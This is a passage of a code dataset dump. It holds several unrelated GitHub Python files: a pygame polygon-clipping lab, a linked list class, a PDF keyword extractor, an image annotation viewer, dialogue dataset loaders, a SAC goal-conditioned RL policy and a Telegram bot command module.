all_ui_elements[\"OX1LC\"]:line_coords[0][0] = int(event.value)\r\n if event.ui_element == all_ui_elements[\"OY1LC\"]:line_coords[0][1] = int(event.value)\r\n if event.ui_element == all_ui_elements[\"OX2LC\"]:line_coords[1][0] = int(event.value)\r\n if event.ui_element == all_ui_elements[\"OY2LC\"]:line_coords[1][1] = int(event.value)\r\n \r\n if event.type == pygame_gui.UI_BUTTON_PRESSED:\r\n if event.ui_element == all_ui_elements[\"DRAW_POLYGON\"]:\r\n render_pipe[2].clear()\r\n render_pipe[2].update({\"draw.polygon\":partial(\r\n draw_vect_polygon,background,GREEN,POLYGON,partial(ToWorldCoords,polygon_coords))})\r\n all_ui_elements[\"CUT_LINE_1\"].show()\r\n all_ui_elements[\"CUT_LINE_2\"].hide();all_ui_elements[\"CUT_LINE_3\"].hide() \r\n if event.ui_element == all_ui_elements[\"DRAW_RECTANGLE\"]:\r\n render_pipe[2].clear()\r\n render_pipe[2].update({\"draw.rectangle\":partial(\r\n draw_vect_polygon,background,GREEN,RECTANGLE,partial(ToWorldCoords,polygon_coords))})\r\n all_ui_elements[\"CUT_LINE_1\"].hide() \r\n all_ui_elements[\"CUT_LINE_2\"].show();all_ui_elements[\"CUT_LINE_3\"].show() \r\n if event.ui_element == all_ui_elements[\"DRAW_LINE\"]:\r\n render_pipe[3].clear()\r\n render_pipe[3].update({\"draw.line\":partial(\r\n draw_vect_line,background,GREEN,partial(ToWorldCoords,line_coords[0]),\r\n partial(ToWorldCoords,line_coords[1]))})\r\n if event.ui_element == all_ui_elements[\"CUT_LINE_1\"]:\r\n render_pipe[3].clear()\r\n render_pipe[3].update({\"draw.cut_line_1\":partial(\r\n draw_cut_line_1,background,RED,GREEN,partial(ToWorldCoords,line_coords[0]),\r\n partial(ToWorldCoords,line_coords[1]),POLYGON,partial(ToWorldCoords,polygon_coords))})\r\n if event.ui_element == all_ui_elements[\"CUT_LINE_2\"]:\r\n render_pipe[3].clear()\r\n render_pipe[3].update({\"draw.cut_line_2\":partial(\r\n draw_cut_line_2,background,RED,GREEN,partial(ToWorldCoords,line_coords[0]),\r\n partial(ToWorldCoords,line_coords[1]),RECTANGLE,partial(ToWorldCoords,polygon_coords)) })\r\n if event.ui_element == all_ui_elements[\"CUT_LINE_3\"]:\r\n render_pipe[3].clear()\r\n render_pipe[3].update({\"draw.cut_line_3\":partial(\r\n draw_cut_line_3,background,RED,GREEN,partial(ToWorldCoords,line_coords[0]),\r\n partial(ToWorldCoords,line_coords[1]),RECTANGLE,partial(ToWorldCoords,polygon_coords))})\r\n manager.process_events(event)\r\n chain_ui()\r\n manager.update(time_delta)\r\n for layer in render_pipe:\r\n for k in layer:layer[k]()\r\n window_surface.blit(background, (0, 0))\r\n manager.draw_ui(window_surface)\r\n display.update()\r\npygame.quit()\r\nquit()","repo_name":"katerinArtem/computer_graphics","sub_path":"lab4/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":12688,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"25355704668","text":"class Node:\r\n \"\"\"Data container and pointer initiator.\"\"\"\r\n\r\n def __init__(self, data=None):\r\n self.data = data\r\n self.next = None\r\n\r\n\r\nclass LinkedList:\r\n \"\"\"Create all the methods we need to operationalize linked list like:\r\n - Add to head, remove from head, reset head, move forward, etc.\r\n \"\"\"\r\n def __init__(self):\r\n self._head = None\r\n self._curr = None\r\n\r\n def add_to_head(self, data):\r\n new_node = Node(data)\r\n new_node.next = self._head\r\n self._head = new_node\r\n self.reset_to_head()\r\n\r\n def remove_from_head(self):\r\n if self._head is None:\r\n return None\r\n ret_val = self._head.data\r\n self._head = self._head.next\r\n self.reset_to_head()\r\n return ret_val\r\n\r\n def reset_to_head(self):\r\n self._curr = self._head\r\n if self._curr is None:\r\n return None\r\n else:\r\n return self._curr.data\r\n\r\n def move_forward(self):\r\n if self._curr is None:\r\n return None\r\n else:\r\n self._curr = self._curr.next\r\n if self._curr is None:\r\n return None\r\n else:\r\n return self._curr.data\r\n\r\n def add_after_curr(self, data):\r\n if self._curr is None:\r\n self.add_to_head(data)\r\n return\r\n new_node = Node(data)\r\n new_node.next = self._curr.next\r\n self._curr.next = new_node\r\n\r\n def remove_after_curr(self):\r\n if self._curr is None or self._curr.next is None:\r\n return None\r\n ret_val = self._curr.next.data\r\n self._curr.next = self._curr.next.next\r\n return ret_val\r\n\r\n def find(self, value):\r\n curr_pos = self._head\r\n while curr_pos is not None:\r\n if curr_pos.data == value:\r\n return curr_pos.data\r\n curr_pos = curr_pos.next\r\n return None\r\n\r\n def delete(self, value):\r\n self.reset_to_head()\r\n if self._curr is None:\r\n return None\r\n if self._curr.data == value:\r\n return self.remove_from_head()\r\n while self._curr.next is not None:\r\n if self._curr.next.data == value:\r\n ret_val = self.remove_after_curr()\r\n self.reset_to_head()\r\n return ret_val\r\n self._curr = self._curr.next\r\n self.reset_to_head()\r\n return None\r\n\r\n def __iter__(self):\r\n self._curr = self._head\r\n return self\r\n\r\n def __next__(self):\r\n if self._curr is None:\r\n raise StopIteration\r\n ret_val = self._curr.data\r\n self.move_forward()\r\n return ret_val","repo_name":"SebastianOpiyo/neural-networks","sub_path":"exercise_A/utils/linkedlists.py","file_name":"linkedlists.py","file_ext":"py","file_size_in_byte":2684,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"25177718065","text":"import PyPDF2\nimport textract\n\nfrom nltk.tokenize import word_tokenize\nfrom nltk.corpus import stopwords\n\n\nfile_path = '/home/sriteja/PycharmProjects/NirdProjms_Scrapping/files/2017/Volume 36, Issue 1, January-March 2017/112698-255599-1-SM.pdf'\n\npdfFileObj = open(file_path,'rb')\n\npdfReader = PyPDF2.PdfFileReader(pdfFileObj)\n\nnum_pages = pdfReader.numPages\n\ncount = 0\ntext = \"\"\n\nwhile count < num_pages:\n pageObj = pdfReader.getPage(count)\n count +=1\n text += pageObj.extractText()\n\nif text == \"\":\n text = textract.process(file_path, method='tesseract', language='eng')\n\ntokens = word_tokenize(text)\n\npunctuations = ['(',')',';',':','[',']',',']\n\nstop_words = stopwords.words('english')\nkeywords = [word for word in tokens if not word in stop_words and not word in punctuations]","repo_name":"sriteja777/web_scraping","sub_path":"NirdProjms_Scrapping/pdf_scrap.py","file_name":"pdf_scrap.py","file_ext":"py","file_size_in_byte":791,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"22132164583","text":"import os\nimport cv2\n\nimage_name = 'TI1K_IMAGE_0123.jpg'\nfolder_name = '../train/'\nannotation_file = '../annotation/label.txt'\n\nf = open(annotation_file)\nlines = f.readlines()\nf.close()\n\nfiles = os.listdir(folder_name)\n\nfor line in lines:\n line = line.strip().split()\n name = line[0]\n if image_name == name:\n print(name)\n line = line[1:]\n for i in range(0, len(line), 2):\n line[i] = int(float(line[i]) * 640)\n line[i + 1] = int(float(line[i + 1]) * 480)\n image = cv2.imread(folder_name + name)\n image = cv2.resize(image, (640, 480))\n image = cv2.rectangle(image, (line[0], line[1]), (line[2], line[3]), (255, 0, 0), 4)\n image = cv2.circle(image, (line[4], line[5]), 12, (0, 0, 255), -10)\n image = cv2.circle(image, (line[6], line[7]), 12, (0, 255, 0), -10)\n cv2.imshow('Visualize Image', image)\n if cv2.waitKey(0) & 0xff == 27:\n break\n","repo_name":"MahmudulAlam/TI1K-Dataset","sub_path":"scripts/visualize_dataset.py","file_name":"visualize_dataset.py","file_ext":"py","file_size_in_byte":947,"program_lang":"python","lang":"en","doc_type":"code","stars":15,"dataset":"github-code","pt":"53"} +{"seq_id":"31585281924","text":"import zipfile\nimport json\nimport warnings\nwarnings.filterwarnings(\"ignore\")\n\nimport re\nimport copy\nimport random\nimport glob\nfrom functools import partial\n\nimport tqdm\nimport torch\nfrom torch.utils.data import Dataset, DataLoader\nfrom transformers import BertTokenizer, BlenderbotTokenizer, RobertaTokenizerFast, BertTokenizerFast\n\n\ndef text_words(t, filter_disfluency=True):\n \"\"\"\n Source: https://github.com/NathanDuran/Switchboard-Corpus\n Tokenized version of the utterance; filter_disfluency=True\n will remove the special utterance notation to make the results\n look more like printed text. The tokenization itself is just\n spitting on whitespace, with no other simplification. The\n return value is a list of str instances.\n \"\"\"\n # t = self.text\n if filter_disfluency:\n t = re.sub(r\"([+/\\}\\[\\]]|\\{\\w)\", \"\", t)\n return ' '.join(re.split(r\"\\s+\", t.strip()))\n#e.g. text_words(swda_data['train'][0]['text'])\n\nclass SWDA_NathanDuran(Dataset):\n \"\"\"\n TODO: Implement this class. Data in data/nathanduran_swda/\n \"\"\"\n pass\n\n\ndef split_dataset_train_valid(dataset, train_valid_ratio=0.9):\n split = dataset.data.train_test_split(test_size=1-train_valid_ratio)\n train = TaskDataset(dataset.task_name, dataset.tokenizer, split, dataset.keys, dataset.num_inputs,\n dataset.data_path, split=\"train\")\n valid = TaskDataset(dataset.task_name, dataset.tokenizer, split, dataset.keys, dataset.num_inputs,\n dataset.data_path, split=\"test\")\n print(f\"Splitting data: {len(dataset)} -> train {len(train)}, valid {len(valid)}\")\n return train, valid\n\n\ndef tok_n_pad(tokenizer, text, max_len, cls_token_id, left_truncate=False):\n input_ids = tokenizer.encode(text, add_special_tokens=False) # remove from tokens\n txt_len = len(input_ids)\n attn_mask = [0] * txt_len\n if txt_len < max_len:\n input_ids = input_ids + [tokenizer.pad_token_id] * (max_len - txt_len - 1) # remove tail / pad tail\n attn_mask = attn_mask + [1] * (max_len - txt_len - 1)\n else:\n if left_truncate:\n input_ids = input_ids[txt_len - max_len + 1:]\n attn_mask = attn_mask[txt_len - max_len + 1:]\n else:\n input_ids = input_ids[:max_len - 1]\n attn_mask = attn_mask[:max_len - 1]\n\n input_ids = [cls_token_id] + input_ids\n attn_mask = [0] + attn_mask\n\n text = torch.tensor(input_ids, dtype=torch.long).view(max_len)\n attn_mask = torch.tensor(attn_mask, dtype=torch.bool).view(max_len)\n return attn_mask, text\n\n\ndef load_dailydial_pp(split, data_path, eou_token):\n # Sample -> {\"context\": \"\", \"response\": \"\", \"label\": \"\"}\n is_adversarial = False\n is_full = False\n if \"/\" in split:\n split, mode = split.split(\"/\")\n if mode == \"adv\":\n is_adversarial = True\n elif mode == \"full\":\n is_full = True\n\n data = []\n with open(f\"{data_path}/dailydialog_pp/dataset/{split}.json\") as f:\n for line in f:\n sample = json.loads(line)\n con = f\" {eou_token} \".join(sample[\"context\"])\n # Positive\n for pos in sample[\"positive_responses\"]:\n data.append({\"context\": con, \"response\": pos, \"label\": 1})\n # Negative\n if is_adversarial:\n for adv in sample[\"adversarial_negative_responses\"]:\n data.append({\"context\": con, \"response\": adv, \"label\": 0})\n elif is_full:\n for adv in sample[\"adversarial_negative_responses\"]:\n data.append({\"context\": con, \"response\": adv, \"label\": 0})\n for neg in sample[\"random_negative_responses\"]:\n data.append({\"context\": con, \"response\": neg, \"label\": 0})\n else:\n for neg in sample[\"random_negative_responses\"]:\n data.append({\"context\": con, \"response\": neg, \"label\": 0})\n return data\n\n\ndef load_e_intent(split, data_path):\n data = []\n with open(f\"{data_path}/e_intents/datasets/train_data/{split}.txt\") as f:\n for line in f:\n label, _, text = line.split(\" \", 2)\n data.append({\"context\": text.strip(), \"label\": int(label.strip())})\n return data\n\n\ndef load_dnli(split, data_path):\n data = []\n label_map ={\n \"negative\": 0,\n \"positive\": 1,\n \"neutral\": 2\n }\n with open(f\"{data_path}/dnli/dialogue_nli/dialogue_nli_{split}.jsonl\") as f:\n f = json.loads(f.read())\n for line in f:\n s1 = line['sentence1']\n s2 = line['sentence2']\n label = label_map[line[\"label\"]]\n data.append({\"sentence1\": s1.strip(), \"sentence2\": s2.strip(), \"label\": label})\n return data\n\nclass TaskDataset(Dataset):\n def __init__(self, task_name, tokenizer, hf_dataset, keys, num_inputs, data_path, split='train', max_len=200, encode_together=False):\n if isinstance(tokenizer, BlenderbotTokenizer):\n self.CLS = tokenizer.bos_token_id\n self.EOU = \"__eou__\"\n elif isinstance(tokenizer, BertTokenizer) or isinstance(tokenizer, BertTokenizerFast):\n self.CLS = tokenizer.cls_token_id\n self.EOU = \"__eou__\"\n elif isinstance(tokenizer, RobertaTokenizerFast):\n self.CLS = tokenizer.cls_token_id\n self.EOU = tokenizer.sep_token\n else:\n raise Exception(f\"Reached Hell: Tokenizer not supported {tokenizer}\")\n\n if task_name.split(\"/\")[0] == \"dd++\":\n data = load_dailydial_pp(split, data_path, self.EOU)\n elif task_name == \"e/intent\":\n data = load_e_intent(split, data_path)\n elif task_name == \"dnli\":\n data = load_dnli(split, data_path)\n else:\n data = hf_dataset[split]\n self.task_name = task_name\n self.data = data\n self.max_len = max_len\n self.tokenizer = tokenizer\n self.keys = keys\n self.num_inputs = num_inputs\n self.data_path = data_path\n self.encode_together = encode_together\n\n def __len__(self):\n return len(self.data)\n\n def __getitem__(self, index):\n entry = self.data[index]\n if self.task_name == \"swda\":\n text = text_words(entry[self.keys[\"input_1\"]])\n else:\n text = entry[self.keys[\"input_1\"]]\n\n if self.encode_together:\n text = text + f\" {self.EOU} \" + entry[self.keys[\"input_2\"]]\n attn_mask, text = tok_n_pad(self.tokenizer, text, max_len=self.max_len, cls_token_id=self.CLS, left_truncate=True)\n\n label = int(entry[self.keys[\"label\"]])\n\n if self.num_inputs == 2 and not self.encode_together:\n resp = entry[self.keys[\"input_2\"]]\n attn_mask, resp = tok_n_pad(self.tokenizer, resp, max_len=self.max_len, cls_token_id=self.CLS)\n\n # input_ids = [1] + input_ids # append token - CLS for blenderbot\n # # TODO: Verify this next line\n # attn_mask = [0] + attn_mask # unmask the [CLS]\n\n # label = torch.tensor(label, dtype=torch.int64).view(1)\n\n if self.num_inputs == 2 and not self.encode_together:\n return text, resp, label\n else:\n return text, label\n\n\nclass RetrievalDatasetCLF(Dataset):\n def __init__(self, task_name, num_neg_samples, split, data_root, tokenizer, ctx_max_len=200, rsp_max_len=50, encode_together=False):\n if task_name in [\"mutual\", \"mutual_plus\"]:\n self.num_neg_samples = num_neg_samples if split != \"test\" else -1\n else:\n self.num_neg_samples = num_neg_samples\n self.task_name = task_name\n self.ctx_max_len = ctx_max_len\n self.rsp_max_len = rsp_max_len\n self.num_classes = 2\n self.tokenizer = tokenizer\n self.encode_together = encode_together\n\n if isinstance(tokenizer, BlenderbotTokenizer):\n self.CLS = tokenizer.bos_token_id\n self.EOU = \"__eou__\"\n elif isinstance(tokenizer, BertTokenizer) or isinstance(tokenizer, BertTokenizerFast):\n self.CLS = tokenizer.cls_token_id\n self.EOU = \"__eou__\"\n elif isinstance(tokenizer, RobertaTokenizerFast):\n self.CLS = tokenizer.cls_token_id\n self.EOU = tokenizer.sep_token\n else:\n raise Exception(f\"Reached Hell: Tokenizer not supported {tokenizer}\")\n\n # Actual data loading\n self.split = split\n self.data = []\n if self.task_name in [\"mutual\", \"mutual_plus\"]:\n if split == \"validation\":\n split = \"dev\"\n # self.con = []\n # self.pos = []\n # self.neg = []\n with zipfile.ZipFile(f\"{data_root}/mutual.zip\") as data_zip:\n pattern = rf\"MuTual-master/data/{task_name}/{split}/.*.txt\"\n rep = re.compile(pattern)\n print(rep)\n all_files = data_zip.namelist()\n fList = [x for x in all_files if rep.match(x)]\n\n for fi in tqdm.tqdm(fList, desc=f\"LOADING({task_name}:{split})\"):\n with data_zip.open(fi) as fh:\n obj = json.load(fh)\n # Preprocessing\n # Remove the m: / f: speaker tags\n speaker_regex = re.compile(r\" *[mf] *: *\", flags=re.IGNORECASE)\n obj[\"article\"] = f\" {self.EOU} \".join(speaker_regex.split(obj['article'])[1:])\n temp = []\n for opt in obj['options']:\n temp.append(speaker_regex.sub(\"\", opt))\n obj[\"options\"] = temp\n\n assert len(obj['options']) == 4\n if split != \"test\":\n ans = ord(obj['answers']) - ord('A')\n for x_index, x in enumerate(obj[\"options\"]):\n if x_index == ans:\n self.data.append((obj[\"article\"], x, 1))\n else:\n self.data.append((obj[\"article\"], x, 0))\n else:\n for x in obj[\"options\"]:\n self.data.append((obj[\"article\"], x, -1))\n elif self.task_name in [\"paa\"]:\n if split == \"validation\":\n split = \"dev\"\n # self.con = []\n # self.pos = []\n # self.neg = []\n path = f\"{data_root}/PAA_downstream/{split}.jsonl\"\n with open(path) as fh:\n for fi in fh:\n obj = json.loads(fi)\n # Preprocessing\n # Remove the m: / f: speaker tags\n obj[\"article\"] = f\" {self.EOU} \".join(obj['context'])\n\n assert len(obj['options']) == 4\n ans = ord(obj['answers']) - ord('A')\n for x_index, x in enumerate(obj[\"options\"]):\n if x_index == ans:\n self.data.append((obj[\"article\"], x, 1))\n else:\n self.data.append((obj[\"article\"], x, 0))\n elif self.task_name == \"dstc7\":\n pass\n else:\n raise NotImplementedError(f\"Umm... What now? [{task_name} not found]\")\n\n def split_train_valid(self, train_valid_ratio):\n assert self.split != \"test\", \"Do not split test set in retrieval\"\n train = copy.deepcopy(self)\n valid = copy.deepcopy(self)\n\n # split\n divisor = (self.num_neg_samples + 1)\n K = int(train_valid_ratio*len(train) // divisor)\n K = int(K * divisor)\n train.data = train.data[:K]\n valid.data = valid.data[K:]\n\n print(f\"Splitting data: {len(self)} -> train {len(train)}, valid {len(valid)}\")\n return train, valid\n\n def __getitem__(self, index):\n context, candidate, label = self.data[index]\n if self.encode_together:\n context = context + f\" {self.EOU} \" + candidate\n _, context = tok_n_pad(self.tokenizer, context, max_len=self.ctx_max_len, cls_token_id=self.CLS,\n left_truncate=True)\n # _, candidate = tok_n_pad(self.tokenizer, candidate, max_len=self.rsp_max_len, cls_token_id=self.CLS)\n\n return context, label\n else:\n _, context = tok_n_pad(self.tokenizer, context, max_len=self.ctx_max_len, cls_token_id=self.CLS, left_truncate=True)\n _, candidate = tok_n_pad(self.tokenizer, candidate, max_len=self.rsp_max_len, cls_token_id=self.CLS)\n\n return context, candidate, label\n\n def __len__(self):\n return len(self.data)\n\n\nif __name__==\"__main__\":\n\n\n mname = 'facebook/blenderbot-3B'\n tokenizer = BlenderbotTokenizer.from_pretrained(mname)\n\n # mname = 'bert-base-uncased'\n # tokenizer = BertTokenizer.from_pretrained(mname)\n tokenizer.add_special_tokens({'sep_token': '__eou__'})\n\n \"\"\"SWDA\n \"\"\"\n # datas = SWDA()\n # dataload = DataLoader(datas, batch_size=8)\n\n \"\"\"Mutual\n \"\"\"\n data = RetrievalDatasetCLF(\"mutual_plus\", 3, \"train\", \"./data\", tokenizer)\n print(len(data))\n # dl = torch.utils.data.DataLoader(data, batch_size=10, shuffle=True)\n # for x in dl:\n # print(x)\n # break\n #\n # data = RetrievalDatasetCLF(\"mutual\", 3, \"validation\", \"./data\", tokenizer)\n # print(len(data))\n #\n # data = RetrievalDatasetCLF(\"mutual\", 3, \"test\", \"./data\", tokenizer)\n # print(len(data))\n # dl = torch.utils.data.DataLoader(data, batch_size=10)\n # for x in dl:\n # print(x)\n # break\n","repo_name":"bsantraigi/2022-DMI-Mirror","sub_path":"datautils/data_swda.py","file_name":"data_swda.py","file_ext":"py","file_size_in_byte":13715,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"7125663432","text":"\"\"\"SAC-compatible goal-conditioned hierarchical policy.\"\"\"\nimport numpy as np\n\nfrom hbaselines.goal_conditioned.base import GoalConditionedPolicy as \\\n BaseGoalConditionedPolicy\nfrom hbaselines.fcnet.sac import FeedForwardPolicy\n\n\nclass GoalConditionedPolicy(BaseGoalConditionedPolicy):\n \"\"\"SAC-compatible goal-conditioned hierarchical policy.\"\"\"\n\n def __init__(self,\n sess,\n ob_space,\n ac_space,\n co_space,\n buffer_size,\n batch_size,\n actor_lr,\n critic_lr,\n verbose,\n tau,\n gamma,\n use_huber,\n l2_penalty,\n model_params,\n target_entropy,\n num_levels,\n meta_period,\n intrinsic_reward_type,\n intrinsic_reward_scale,\n relative_goals,\n off_policy_corrections,\n hindsight,\n subgoal_testing_rate,\n cooperative_gradients,\n cg_weights,\n cg_delta,\n pretrain_worker,\n pretrain_path,\n pretrain_ckpt,\n total_steps,\n scope=None,\n env_name=\"\",\n num_envs=1):\n \"\"\"Instantiate the goal-conditioned hierarchical policy.\n\n Parameters\n ----------\n sess : tf.compat.v1.Session\n the current TensorFlow session\n ob_space : gym.spaces.*\n the observation space of the environment\n ac_space : gym.spaces.*\n the action space of the environment\n co_space : gym.spaces.*\n the context space of the environment\n buffer_size : int\n the max number of transitions to store\n batch_size : int\n SGD batch size\n actor_lr : float\n actor learning rate\n critic_lr : float\n critic learning rate\n verbose : int\n the verbosity level: 0 none, 1 training information, 2 tensorflow\n debug\n tau : float\n target update rate\n gamma : float\n discount factor\n use_huber : bool\n specifies whether to use the huber distance function as the loss\n for the critic. If set to False, the mean-squared error metric is\n used instead\n l2_penalty : float\n L2 regularization penalty. This is applied to the policy network.\n model_params : dict\n dictionary of model-specific parameters. See parent class.\n target_entropy : float\n target entropy used when learning the entropy coefficient. If set\n to None, a heuristic value is used.\n num_levels : int\n number of levels within the hierarchy. Must be greater than 1. Two\n levels correspond to a Manager/Worker paradigm.\n meta_period : int or [int]\n meta-policy action period. For multi-level hierarchies, a separate\n meta period can be provided for each level (indexed from highest to\n lowest)\n intrinsic_reward_type : str\n the reward function to be used by the lower-level policies. See the\n base goal-conditioned policy for a description.\n intrinsic_reward_scale : [float]\n the value that the intrinsic reward should be scaled by. One for\n each lower-level.\n relative_goals : bool\n specifies whether the goal issued by the higher-levels policies is\n meant to be a relative or absolute goal, i.e. specific state or\n change in state\n off_policy_corrections : bool\n whether to use off-policy corrections during the update procedure.\n See: https://arxiv.org/abs/1805.08296\n hindsight : bool\n whether to include hindsight action and goal transitions in the\n replay buffer. See: https://arxiv.org/abs/1712.00948\n subgoal_testing_rate : float\n rate at which the original (non-hindsight) sample is stored in the\n replay buffer as well. Used only if `hindsight` is set to True.\n cooperative_gradients : bool\n whether to use the cooperative gradient update procedure for the\n higher-level policy. See: https://arxiv.org/abs/1912.02368v1\n cg_weights : float\n weights for the gradients of the loss of the lower-level policies\n with respect to the parameters of the higher-level policies. Only\n used if `cooperative_gradients` is set to True.\n cg_delta : float\n the desired lower-level expected returns. If set to None, a fixed\n Lagrangian specified by cg_weights is used instead. Only used if\n `cooperative_gradients` is set to True.\n pretrain_worker : bool\n specifies whether you are pre-training the lower-level policies.\n Actions by the high-level policy are randomly sampled from its\n action space.\n pretrain_path : str or None\n path to the pre-trained worker policy checkpoints\n pretrain_ckpt : int or None\n checkpoint number to use within the worker policy path. If set to\n None, the most recent checkpoint is used.\n total_steps : int\n Total number of timesteps used during training. Used by a subset of\n algorithms.\n \"\"\"\n self.buffer_size = buffer_size\n self.batch_size = batch_size\n self.actor_lr = actor_lr\n self.critic_lr = critic_lr\n self.tau = tau\n self.gamma = gamma\n self.use_huber = use_huber\n\n super(GoalConditionedPolicy, self).__init__(\n sess=sess,\n ob_space=ob_space,\n ac_space=ac_space,\n co_space=co_space,\n buffer_size=buffer_size,\n batch_size=batch_size,\n actor_lr=actor_lr,\n critic_lr=critic_lr,\n verbose=verbose,\n tau=tau,\n gamma=gamma,\n use_huber=use_huber,\n l2_penalty=l2_penalty,\n model_params=model_params,\n num_levels=num_levels,\n meta_period=meta_period,\n intrinsic_reward_type=intrinsic_reward_type,\n intrinsic_reward_scale=intrinsic_reward_scale,\n relative_goals=relative_goals,\n off_policy_corrections=off_policy_corrections,\n hindsight=hindsight,\n subgoal_testing_rate=subgoal_testing_rate,\n cooperative_gradients=cooperative_gradients,\n cg_weights=cg_weights,\n cg_delta=cg_delta,\n scope=scope,\n env_name=env_name,\n pretrain_worker=pretrain_worker,\n pretrain_path=pretrain_path,\n pretrain_ckpt=pretrain_ckpt,\n total_steps=total_steps,\n num_envs=num_envs,\n meta_policy=FeedForwardPolicy,\n worker_policy=FeedForwardPolicy,\n additional_params=dict(\n target_entropy=target_entropy,\n ),\n )\n\n # ======================================================================= #\n # Auxiliary methods for HIRO #\n # ======================================================================= #\n\n def _log_probs(self, meta_actions, worker_obses, worker_actions):\n \"\"\"Calculate the log probability of the next goal by the meta-policies.\n\n Parameters\n ----------\n meta_actions : array_like\n (batch_size, m_ac_dim, num_samples) matrix of candidate higher-\n level policy actions\n worker_obses : array_like\n (batch_size, w_obs_dim, meta_period + 1) matrix of lower-level\n policy observations\n worker_actions : array_like\n (batch_size, w_ac_dim, meta_period) list of lower-level policy\n actions\n\n Returns\n -------\n array_like\n (batch_size, num_samples) fitness associated with every state /\n action / goal pair\n\n Helps\n -----\n * _sample_best_meta_action(self):\n \"\"\"\n fitness = []\n batch_size, goal_dim, num_samples = meta_actions.shape\n _, _, meta_period = worker_actions.shape\n\n # Loop through the elements of the batch.\n for i in range(batch_size):\n # Extract the candidate goals for the current element in the batch.\n # The worker observations and actions from the meta period of the\n # current batch are also collected to compute the log-probability\n # of a given candidate goal.\n goals_per_sample = meta_actions[i, :, :].T\n worker_obses_per_sample = worker_obses[i, :, :].T\n worker_actions_per_sample = worker_actions[i, :, :].T\n\n # This will be used to store the cumulative log-probabilities of a\n # given candidate goal for the entire meta-period.\n fitness_per_sample = np.zeros(num_samples)\n\n # Create repeated representations of each worker action for each\n # candidate goal.\n tiled_worker_actions_per_sample = np.tile(\n worker_actions_per_sample, (num_samples, 1))\n\n # Create repeated representations of each worker observation for\n # each candidate goal. The indexing of worker_obses_per_sample is\n # meant to do the following:\n # 1. We remove the last observation since it does not correspond\n # to any action for the current meta-period.\n # 2. Unlike the TD3 implementation, we keep the trailing context\n # (goal) terms since they are needed to compute the log-prob\n # of a given action when feeding to logp_action.\n tiled_worker_obses_per_sample = np.tile(\n worker_obses_per_sample[:-1, :], (num_samples, 1))\n\n # Create repeated representations of each candidate goal for each\n # worker observation in a meta period.\n tiled_goals_per_sample = np.tile(\n goals_per_sample, meta_period).reshape(\n (num_samples * meta_period, goal_dim))\n\n # If relative goals are being used, update the later goals to match\n # what they would be under the relative goals difference approach.\n if self.relative_goals:\n goal_diff = worker_obses_per_sample[:-1, :] - np.tile(\n worker_obses_per_sample[0, :], (meta_period, 1))\n tiled_goals_per_sample += \\\n np.tile(goal_diff, (num_samples, 1))[:, :goal_dim]\n\n # Compute the log-probability of each action using the logp_action\n # attribute of the SAC lower-level policy.\n normalized_error = self.sess.run(\n self.policy[-1].logp_action,\n feed_dict={\n self.policy[-1].obs_ph: tiled_worker_obses_per_sample,\n self.policy[-1].action_ph: tiled_worker_actions_per_sample,\n }\n )\n\n # Sum the different normalized errors to get the fitness of each\n # candidate goal.\n for j in range(num_samples):\n fitness_per_sample[j] = np.sum(\n normalized_error[j * meta_period: (j+1) * meta_period])\n\n fitness.append(fitness_per_sample)\n\n return np.array(fitness)\n\n # ======================================================================= #\n # Auxiliary methods for CHER #\n # ======================================================================= #\n\n def _setup_cooperative_gradients(self):\n \"\"\"Create the cooperative gradients meta-policy optimizer.\"\"\"\n raise NotImplementedError\n\n def _cooperative_gradients_update(self,\n obs0,\n actions,\n rewards,\n obs1,\n terminals1,\n level_num,\n update_actor=True):\n \"\"\"Perform the gradient update procedure for the CHER algorithm.\n\n This procedure is similar to update_from_batch, expect it runs the\n self.cg_optimizer operation instead of the policy object's optimizer,\n and utilizes some information from the worker samples as well.\n\n Parameters\n ----------\n obs0 : list of array_like\n (batch_size, obs_dim) matrix of observations for every level in the\n hierarchy\n actions : list of array_like\n (batch_size, ac_dim) matrix of actions for every level in the\n hierarchy\n obs1 : list of array_like\n (batch_size, obs_dim) matrix of next step observations for every\n level in the hierarchy\n rewards : list of array_like\n (batch_size,) vector of rewards for every level in the hierarchy\n terminals1 : list of numpy bool\n (batch_size,) vector of done masks for every level in the hierarchy\n level_num : int\n the hierarchy level number of the policy to optimize\n update_actor : bool\n specifies whether to update the actor policy of the meta policy.\n The critic policy is still updated if this value is set to False.\n\n Returns\n -------\n [float, float]\n higher-level policy critic loss\n float\n higher-level policy actor loss\n \"\"\"\n raise NotImplementedError\n","repo_name":"AboudyKreidieh/h-baselines","sub_path":"hbaselines/goal_conditioned/sac.py","file_name":"sac.py","file_ext":"py","file_size_in_byte":13860,"program_lang":"python","lang":"en","doc_type":"code","stars":250,"dataset":"github-code","pt":"53"} +{"seq_id":"19277195059","text":"#from tgbots import UB, NB, MY_ID, BOT_ID, CONFIG\n\nfrom . import *\n\nlogger = logging.getLogger(__name__)\n\nfrom ..utils.telegram import my_popen, text2link, get_info_from_bot\n\n\n\nasync def _(event):\n logger.info(\"cmd {}: {}: {}\".format( __name__.split(\".\")[-1], event.sender_id, event.raw_text))\n client = event.client\n msg = event.message\n chat_id = event.chat_id\n\n cmd = await get_cmd(event)\n if len(cmd) == 1:\n info = await get_info_from_bot(\"/\"+\" \".join(cmd), uid=573173175, key=\"使用方式\")\n else:\n# info = await get_info_from_bot(\"/\"+\" \".join(cmd), uid=573173175, key=\"域名\")\n info = await get_info_from_bot(\"/\"+\" \".join(cmd), uid=573173175, skip=\"正在请求中\")\n if info:\n info += \"\\ntelegram bot: @WooMaiBot\"\n# info += \"\\n----\\n\"\n else:\n info = \"\"\n await cmd_answer(info, event)\n\n# if len(cmd) == 1:\n# elif len(cmd) == 2:\n# elif cmd[1] == \"down\":\n\n\ncmd = __name__.split(\".\")[-1]\nneed = need & ~CMD.is_admin\nCMD.add(_, cmd=cmd, need=need, forbid=forbid)\n","repo_name":"liqsliu/bot","sub_path":"telebot/tg_telethon/modules/gfwtest.py","file_name":"gfwtest.py","file_ext":"py","file_size_in_byte":1046,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"5496607442","text":"\nimport torch\nimport torch.nn as nn\nimport numpy as np\nimport torch.nn.functional as 